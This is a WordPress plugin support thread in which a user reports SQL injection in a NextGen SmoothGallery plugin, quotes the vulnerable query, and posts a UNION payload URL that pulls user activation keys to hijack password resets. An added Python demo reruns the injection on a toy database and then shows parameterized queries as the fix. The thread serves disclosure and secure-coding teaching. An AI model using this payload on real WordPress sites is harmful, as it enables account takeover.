• This plugin was responsible for my blogs getting hacked, as they use highly vulnerable code in this plugin.

    There is no protection against SQL injection in the plugin functions. Request parameters are happily added to some SQL query without escaping them; in the following example $galleryID is simply a copy of $_REQUEST["galleryID"]:

    // $galleryID is taken straight from $_REQUEST["galleryID"] and spliced into the query unescaped
    $pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");

    I recommend not using this plugin at all. It was obviously developed by some programming beginner and should not be used on a production site.

    Example: Set your own activation key for a user to reset the password to your own:

    nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'

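The injection described in the post, as an added worked example that is not code from the review, the reviewed plugin, or either SmoothGallery project. It rebuilds the quoted query shape against a constructed in-memory SQLite database (table and column names follow the page, the rows and the four-column SELECT are made up for the demo), runs the page's UNION payload adapted to SQLite syntax (string concatenation and a trailing comment instead of MySQL's concat() and hex literals), and then shows the hardened form: the request value bound as a query parameter, which is what $wpdb->prepare() does in WordPress, plus an allow-list for the ORDER BY column and direction, since those cannot be bound.

```python
import sqlite3

# Constructed stand-in for the three WordPress tables the plugin query touches.
# Table and column names follow the page; the rows are made up for this demo.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_nggallery   (gid INTEGER, title TEXT);
        CREATE TABLE wp_nggpictures (pid INTEGER, galleryid INTEGER, filename TEXT, exclude INTEGER);
        CREATE TABLE wp_users       (ID INTEGER, user_login TEXT, user_activation_key TEXT);
        INSERT INTO wp_nggallery   VALUES (1, 'Holiday');
        INSERT INTO wp_nggpictures VALUES (10, 1, 'beach.jpg', 0), (11, 1, 'hidden.jpg', 1);
        INSERT INTO wp_users       VALUES (1, 'admin', 'k3y-admin'), (2, 'editor', 'k3y-editor');
    """)
    return conn

# Vulnerable form: the request value is spliced into the SQL string, exactly
# like "WHERE t.gid = '$galleryID'" in the plugin line quoted above.
def vulnerable_query(conn, gallery_id, sort="pid", sort_dir="ASC"):
    sql = (
        "SELECT t.gid, t.title, tt.pid, tt.filename "
        "FROM wp_nggallery AS t INNER JOIN wp_nggpictures AS tt ON t.gid = tt.galleryid "
        f"WHERE t.gid = '{gallery_id}' AND tt.exclude != 1 "
        f"ORDER BY tt.{sort} {sort_dir}"
    )
    return conn.execute(sql).fetchall()

# The page's MySQL payload adapted to SQLite: the first quote closes the
# original string literal, the UNION selects four columns to match the SELECT
# above, and the trailing "-- " comments out the rest of the plugin's query.
PAYLOAD = (
    "999999.9' UNION ALL SELECT 1, user_login, 2, user_activation_key "
    "FROM wp_users WHERE user_login = 'admin' -- "
)

# Hardened form: the value is bound as a parameter (the $wpdb->prepare()
# equivalent in WordPress), and the ORDER BY parts, which cannot be bound,
# are checked against an allow-list before being interpolated.
ALLOWED_SORT = {"pid", "filename"}
ALLOWED_DIR = {"ASC", "DESC"}

def safe_query(conn, gallery_id, sort="pid", sort_dir="ASC"):
    if sort not in ALLOWED_SORT or sort_dir not in ALLOWED_DIR:
        raise ValueError("unexpected sort option")
    sql = (
        "SELECT t.gid, t.title, tt.pid, tt.filename "
        "FROM wp_nggallery AS t INNER JOIN wp_nggpictures AS tt ON t.gid = tt.galleryid "
        "WHERE t.gid = ? AND tt.exclude != 1 "
        f"ORDER BY tt.{sort} {sort_dir}"
    )
    return conn.execute(sql, (gallery_id,)).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("normal:  ", vulnerable_query(db, "1"))
    print("injected:", vulnerable_query(db, PAYLOAD))  # leaks admin's activation key
    print("hardened:", safe_query(db, PAYLOAD))        # payload is just a non-matching string
```

The bound parameter never becomes part of the SQL text, so the payload is compared as one opaque string against t.gid and matches nothing; the same holds for %d in $wpdb->prepare(), which additionally coerces the value to an integer. The ORDER BY allow-list matters because the plugin line also interpolates $ngg_options[galSort] and $ngg_options[galSortDir], and anything that lands in those options ends up in the query unquoted.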
Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Christian Schenk

    (@chschenk)

    Hi Thomas,

    I think that you’ve submitted your rating to the wrong plugin. The above code, i.e. the references to “ngg”, seems to be part of the NextGen gallery plugin – maybe the SmoothGallery plugin for NextGen gallery itself – and I’m pretty sure that they will be happy to fix these issues if you hint them into the right direction.

    My plugin is a standalone plugin for SmoothGallery and I tried to avoid the above vulnerability. Maybe my plugin has got an issue as well – I’ll try fixing it as soon as something like this comes to my attention. So far, I haven’t had any security issues with the plugin. If you find something problematic in the code please let me know.

    Kind regards,
    Christian

    Thread Starter Thomas Heuer

    (@thomas-heuer)

    I’m so sorry. You are right. How many plugins called “Smooth Gallery” are out there?

    Now I posted that same comment to the real plugin’s author page:
    https://uninuni.com/wordpress-plugin-nextgen-smooth-gallery/

    I would like to delete this comment here, but can’t find out how to accomplish that.

    Plugin Author Christian Schenk

    (@chschenk)

    Hi Thomas,

    no problem, I know that it can be quite confusing regarding the variety of plugins for SmoothGallery. I’m aware of my plugin for SmoothGallery, the SmoothGallery plugin for the NextGen gallery plugin (the uninuni.com guys) and a few other plugins that simply replace WP’s standard gallery with a SmoothGallery or similar.

    Even if you can’t remove the negative rating, at least you supplied a comment :) It’s much better than just negative feedback without a single hint.

    Regards,
    Christian

  • The topic ‘Bad programmed plugin with vulnerabilities’ is closed to new replies.